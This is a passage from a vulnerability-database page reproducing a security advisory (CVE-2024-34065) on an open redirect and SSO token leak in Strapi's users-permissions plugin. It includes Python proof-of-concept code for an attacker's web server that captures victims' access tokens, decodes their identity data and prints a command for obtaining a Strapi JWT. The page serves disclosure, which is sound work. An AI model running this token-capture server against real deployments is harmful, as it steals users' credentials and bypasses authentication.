reduce verbosity.\n    def log_message(self, format, *args):\n        pass\n\n    # This function automatically redirects a user to the page defined in the\n    # global variable linked to the redirection.\n    def _set_response(self):\n        self.send_response(302)\n        self.send_header(\"Location\", REDIRECT_URL[0])\n        self.end_headers()\n\n    # If an SSO token is present, we parse it and log the result in STDOUT.\n    def do_GET(self):\n        # This condition checks whether a token is present in the URL.\n        if str(self.path).find(\"access_token\") != -1:\n            # If this is the case, we recover the token.\n            query = urllib.parse.urlparse(self.path).query\n            query_components = dict(qc.split(\"=\") for qc in query.split(\"\u0026\"))\n            access_token = urllib.parse.unquote(query_components[\"access_token\"])\n\n            # In the token, which is a string in JWT format, we retrieve the\n            # body part of the token.\n            interesting_data = access_token.split(\".\")[1]\n\n            # Patching base64 encoded data.\n            interesting_data = interesting_data + \"=\" * (-len(interesting_data) % 4)\n\n            # Parsing JSON.\n            json_data = json.loads(base64.b64decode(interesting_data.encode()))\n            family_name, given_name, ipaddr, upn = json_data[\"given_name\"], json_data[\"family_name\"], json_data[\"ipaddr\"], json_data[\"upn\"]\n\n            print(f\"[+] Token captured for {family_name} {given_name}, {upn} ({ipaddr}):\\n{access_token}\\n\")\n            print(f\"[*] Run: \\\"{generate_curl_command(query_components[\u0027access_token\u0027])}\\\" to get JWT token\")\n\n        self._set_response()\n        self.wfile.write(\"Redirecting ...\".encode(\"utf-8\"))\n\n\ndef run(server_class=HTTPServer, handler_class=CustomServer, ip=\"0.0.0.0\", port=8080):\n    server_address = (ip, port)\n    httpd = server_class(server_address, handler_class)\n\n    print(f\"Starting httpd ({ip}:{port}) ...\")\n    try:\n        httpd.serve_forever()\n    except KeyboardInterrupt:\n        pass\n\n    httpd.server_close()\n    print(\"Stopping httpd ...\")\n\n\nif __name__ == \"__main__\":\n    if len(argv) == 3:\n        run(ip=argv[1], port=int(argv[2]))\n    else:\n        run()\n```\n",
  "id": "GHSA-wrvh-rcmr-9qfc",
  "modified": "2024-06-12T19:39:11Z",
  "published": "2024-06-12T19:39:11Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/strapi/strapi/security/advisories/GHSA-wrvh-rcmr-9qfc"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34065"
    },
    {
      "type": "WEB",
      "url": "https://github.com/strapi/strapi/commit/9c79921d22142a5de77ea26151550a14e4b12669"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/strapi/strapi"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "@strapi/plugin-users-permissions leaks 3rd party authentication tokens and authentication bypass"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2024-34065 (GCVE-0-2024-34065)

WID-SEC-W-2024-1455

FKIE_CVE-2024-34065

GHSA-WRVH-RCMR-9QFC

Summary

Impact

Technical details

Vulnerability 1: Open Redirect

Description

Remediation

Example 1: Open Redirect in /api/connect/microsoft via $_GET["callback"]

Vulnerability 2: Session token in URL

Description

Example 1: SSO token transmitted within URL ($_GET["access_token"])

Details

Get the JWT token with the access_token

Request API routes using the JWT token

POC (Web server stealing SSO token and retrieving JWT token then bypassing authentication)

Tags

Sightings

Nomenclature

Example 1: Open Redirect in /api/connect/microsoft via `$_GET["callback"]`

Example 1: SSO token transmitted within URL (`$_GET["access_token"]`)

Get the JWT token with the `access_token`